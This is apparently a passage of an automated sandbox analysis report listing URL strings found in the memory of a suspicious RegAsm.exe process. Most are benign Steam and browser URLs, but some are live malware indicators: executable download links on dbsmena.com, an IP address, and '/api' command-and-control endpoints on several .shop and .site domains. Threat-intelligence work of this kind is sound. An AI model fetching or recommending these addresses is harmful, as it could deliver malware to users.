Source: RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162HJKKEGI--
Source: RegAsm.exe, 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162IJKJE
Source: RegAsm.exe, 0000000D.00000002.2702734950.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162KKEGI
Source: RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162a
Source: IEHJJE.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 00000009.00000002.2414270008.00000000015C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/8
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: IEHJJE.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: IEHJJE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: IEHJJE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/librari
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/
Source: RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/ljhgfsd.exe
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/ljhgfsd.exeent-Disposition:
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000125A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2387120277.00000000014F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/vdshfd.exe
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/vdshfd.exeac
Source: RegAsm.exe, 00000003.00000002.2387120277.00000000014F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/vdshfd.exen
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/y
Source: IEHJJE.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IEHJJE.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IEHJJE.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/apiU
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/api
Source: RegAsm.exe, 00000009.00000002.2414270008.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/apiY
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: EBAFBG.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
